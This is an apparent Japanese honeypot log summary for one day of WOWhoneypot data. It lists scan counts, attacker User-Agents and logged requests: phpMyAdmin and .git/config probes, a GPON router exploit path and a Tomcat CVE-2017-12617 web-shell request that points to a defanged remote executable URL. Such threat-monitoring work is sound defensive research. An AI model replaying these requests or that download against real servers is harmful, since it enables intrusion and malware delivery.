ハニーポットのログ分析(2019/03/20)
WOWhoneypotの2019/03/20(水) (運用287日目)の簡易分析です。
本日の総アクセス件数は53件です。送信元IP数は38IPです。
本日の主なアクセスは以下です。
・ phpMyAdminの調査:5 件
・ GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃:3 件
→3件中2件はAVTECHでした。
特殊なUser-Agentは以下が来ていました。
6 User-Agent: ZmEu
3 User-Agent: Hello, World
2 User-Agent: Z
2 User-Agent: Mozilla/5.0 zgrab/0.x
本日のドメイン名でのアクセスは以下です。
1 GET /
本日のハンティングログはありません。
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 33 | 2019/3/20 | アクセス | GET / |
| 3 | 2019/3/20 | GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 | POST /GponForm/diag_Form?style/ |
| 1 | 2019/3/20 | クローリング | HEAD /robots.txt |
| 1 | 2019/3/20 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
| 1 | 2019/3/20 | 脆弱性スキャンツールZmEuによる調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
| 1 | 2019/3/20 | Drupalの調査 | GET /user/register/ |
| 1 | 2019/3/20 | サイト構成調査 | GET /sitemap.xml |
| 1 | 2019/3/20 | クローリング | GET /robots.txt |
| 1 | 2019/3/20 | phpMyAdminの調査 | GET /pma/scripts/setup.php |
| 1 | 2019/3/20 | phpMyAdminの調査 | GET /phpMyAdmin/scripts/setup.php |
| 1 | 2019/3/20 | phpMyAdminの調査 | GET /phpmyadmin/scripts/setup.php |
| 1 | 2019/3/20 | phpMyAdminの調査 | GET /MyAdmin/scripts/setup.php |
| 1 | 2019/3/20 | phpMyAdminの調査 | GET /myadmin/scripts/setup.php |
| 1 | 2019/3/20 | Gitの調査 | GET /.git/config |
| 1 | 2019/3/20 | Tomcatの脆弱性(CVE-2017-12617)を突いた攻撃 | GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fid.hognoob.se/download.exe |
| 1 | 2019/3/20 | 録画予約システムfoltia ANIME LOCKERの調査 | GET /foltia/ |
| 1 | 2019/3/20 | アクセス | GET /favicon.ico |
| 1 | 2019/3/20 | 録画予約システムepgrecの調査 | GET /epgrec/do-record.sh |
| 1 | 2019/3/20 | 不正中継の調査 | CONNECT www.youtube.com:443 |
以上です。
